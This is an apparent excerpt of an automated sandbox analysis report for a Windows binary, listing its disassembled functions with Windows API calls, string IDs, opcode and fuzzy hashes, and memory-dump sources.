                                                                                                                        • Opcode Fuzzy Hash: 20f2eb5d2d91abfd9fa27665fd2662d76610ecf7fddadbe8545b4fe00e8cf82f
                                                                                                                        • Instruction Fuzzy Hash: 4BD1E271A00916DBDB10AF65E889B7DBFB9BF86700F10846AE846BB180DB30DC46DF55
                                                                                                                        Function 0059B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059B6F4
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059B772
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0059B80A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059B87E
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059B89C
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0059B8F2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059B904
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059B922
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0059B983
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059B994
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                        • Opcode ID: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
                                                                                                                        • Instruction ID: 4ec804f3d070aa3baf3fd6b8bd418a48a303274b3022ac858df8b860c9b2d091
                                                                                                                        • Opcode Fuzzy Hash: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
                                                                                                                        • Instruction Fuzzy Hash: B9C17D30204202AFEB10DF14D599F6ABFE5FF84308F14855CE59A4B2A2CB75ED86CB91
                                                                                                                        Function 005A541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005A5504
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A5515
                                                                                                                        • CharNextW.USER32(00000158), ref: 005A5544
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005A5585
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005A559B
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A55AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1350042424-2594219639
                                                                                                                        • Opcode ID: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                                                                                        • Instruction ID: ea8e2b4be976ada3c33e14a844faf45e9a5f019e2946aaab4e145fcb64cc028e
                                                                                                                        • Opcode Fuzzy Hash: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                                                                                        • Instruction Fuzzy Hash: D7615931904609EFDF119F64CC84EBE7FB9FB1A720F104545FA25AB290E7748A84DB60
                                                                                                                        Function 0059255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 005925D8
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005925E8
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 005925F4
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00592601
                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0059266D
                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005926AC
                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005926D0
                                                                                                                        • SelectObject.GDI32(?,?), ref: 005926D8
                                                                                                                        • DeleteObject.GDI32(?), ref: 005926E1
                                                                                                                        • DeleteDC.GDI32(?), ref: 005926E8
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 005926F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        • Opcode ID: 5c2cf2da8845943059c626156fcb514df7823f3a36b976771d72467e806eedf8
                                                                                                                        • Instruction ID: 3c1a2fd0e8e0f01e1f23edcf63cf8a97ac779e41231635b2ac480e4f37ea9cc5
                                                                                                                        • Opcode Fuzzy Hash: 5c2cf2da8845943059c626156fcb514df7823f3a36b976771d72467e806eedf8
                                                                                                                        • Instruction Fuzzy Hash: A061D275E00219EFCF05CFA8D988AAEBBF5FF58310F208529E956A7250D770A941DF90
                                                                                                                        Function 0057E6B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 0057E6B4
                                                                                                                          • Part of subcall function 0052E551: timeGetTime.WINMM(?,?,0057E6D4), ref: 0052E555
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0057E6E1
                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0057E705
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0057E727
                                                                                                                        • SetActiveWindow.USER32 ref: 0057E746
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0057E754
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0057E773
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 0057E77E
                                                                                                                        • IsWindow.USER32 ref: 0057E78A
                                                                                                                        • EndDialog.USER32(00000000), ref: 0057E79B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: @U=u$BUTTON
                                                                                                                        • API String ID: 1194449130-2582809321
                                                                                                                        • Opcode ID: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
                                                                                                                        • Instruction ID: f073b9751afbd4aa994e19799cc77203efcd0e95fc8a64b490d8719a6423eb07
                                                                                                                        • Opcode Fuzzy Hash: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
                                                                                                                        • Instruction Fuzzy Hash: 4B2162B0200385AFEF045F25FCCAA253F6DF77A349F108465F549861A5DFB1AC08BA24
                                                                                                                        Function 0054DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0054DAA1
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D659
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D66B
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D67D
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D68F
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6A1
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6B3
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6C5
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6D7
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6E9
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6FB
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D70D
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D71F
                                                                                                                          • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D731
                                                                                                                        • _free.LIBCMT ref: 0054DA96
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054DAB8
                                                                                                                        • _free.LIBCMT ref: 0054DACD
                                                                                                                        • _free.LIBCMT ref: 0054DAD8
                                                                                                                        • _free.LIBCMT ref: 0054DAFA
                                                                                                                        • _free.LIBCMT ref: 0054DB0D
                                                                                                                        • _free.LIBCMT ref: 0054DB1B
                                                                                                                        • _free.LIBCMT ref: 0054DB26
                                                                                                                        • _free.LIBCMT ref: 0054DB5E
                                                                                                                        • _free.LIBCMT ref: 0054DB65
                                                                                                                        • _free.LIBCMT ref: 0054DB82
                                                                                                                        • _free.LIBCMT ref: 0054DB9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        • Opcode ID: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
                                                                                                                        • Instruction ID: 2d6e3b6f5a3c5c42a1fc12d99973f5fba1c2b25e96e381818fc4bf4e6d23e272
                                                                                                                        • Opcode Fuzzy Hash: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
                                                                                                                        • Instruction Fuzzy Hash: 28312A316046069FEB22AA3AE849BDA7FF9FF40318F55441AF449D7291DA35AC80CB30
                                                                                                                        Function 0057365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0057369C
                                                                                                                        • _wcslen.LIBCMT ref: 005736A7
                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00573797
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0057380C
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0057385D
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00573882
                                                                                                                        • GetParent.USER32(?), ref: 005738A0
                                                                                                                        • ScreenToClient.USER32(00000000), ref: 005738A7
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00573921
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0057395D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                        • String ID: %s%u
                                                                                                                        • API String ID: 4010501982-679674701
                                                                                                                        • Opcode ID: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
                                                                                                                        • Instruction ID: 317b7c397bd0880e0e8153a9bc3f02a8e07af5eaf326be7df6a93a3a6328cd43
                                                                                                                        • Opcode Fuzzy Hash: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
                                                                                                                        • Instruction Fuzzy Hash: D991B371204617AFD718DF24D885BAABFA8FF44360F008529FA9DD2190DB30EA45EB91
                                                                                                                        Function 00574954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00574994
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 005749DA
                                                                                                                        • _wcslen.LIBCMT ref: 005749EB
                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 005749F7
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00574A2C
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00574A64
                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00574A9D
                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00574AE6
                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00574B20
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00574B8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                        • String ID: ThumbnailClass
                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                        • Opcode ID: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
                                                                                                                        • Instruction ID: 6862e355f64ae1b0f7a1f9936421b4d5cbe64e2ad6600e7fc6a1b810eebfb31d
                                                                                                                        • Opcode Fuzzy Hash: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
                                                                                                                        • Instruction Fuzzy Hash: D891AA310042069FDB05DF14E985BAABFE9FF84314F04846AFD899A096EB30ED45DFA1
                                                                                                                        Function 005A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A8D5A
                                                                                                                        • GetFocus.USER32 ref: 005A8D6A
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 005A8D75
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 005A8E1D
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005A8ECF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 005A8EEC
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 005A8EFC
                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005A8F2E
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005A8F70
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005A8FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1026556194-4108050209
                                                                                                                        • Opcode ID: 854cfa4af9d39aaa85d806abfbdb3e1af39c3db621e4703754a01766f84f4079
                                                                                                                        • Instruction ID: fbe2605fa42ec8feb1f36669579a9faec27f22c9a864aecfae981815a84f2d8a
                                                                                                                        • Opcode Fuzzy Hash: 854cfa4af9d39aaa85d806abfbdb3e1af39c3db621e4703754a01766f84f4079
                                                                                                                        • Instruction Fuzzy Hash: 25818C71508302AFDB20CF24D888ABFBFE9FB9A354F140919F98597291DB70D905DBA1
                                                                                                                        Function 0059CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CC64
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0059CC8D
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD48
                                                                                                                          • Part of subcall function 0059CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0059CCAA
                                                                                                                          • Part of subcall function 0059CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0059CCBD
                                                                                                                          • Part of subcall function 0059CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059CCCF
                                                                                                                          • Part of subcall function 0059CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD05
                                                                                                                          • Part of subcall function 0059CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CD28
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059CCF3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                        • Opcode ID: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                                                                                        • Instruction ID: 76449b2b1065bb2c4135b0473957e9dec6189acc7770e4949f094441577c5f4f
                                                                                                                        • Opcode Fuzzy Hash: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                                                                                        • Instruction Fuzzy Hash: 94316E71A41229BBDB208B54DC88EFFBFBCFF56750F000165E905E6240DB349E49EAA0
                                                                                                                        Function 0057E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0057EA5D
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057EA73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057EA84
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0057EA96
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057EAA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                        • Opcode ID: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                                                                                        • Instruction ID: b23c9614e526a7b91241434ed60e74c863b90059a5dfcc7ebf550558c172c401
                                                                                                                        • Opcode Fuzzy Hash: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                                                                                        • Instruction Fuzzy Hash: C2115131A5021A79E720A7A5DC5FDFF6F7CFBD5B40F00082BB811A21D1EA701946D9B1
                                                                                                                        Function 00528BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
                                                                                                                        • DestroyWindow.USER32(?), ref: 00528C81
                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528D1B
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00566973
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669A1
                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669B8
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000), ref: 005669D4
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005669E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
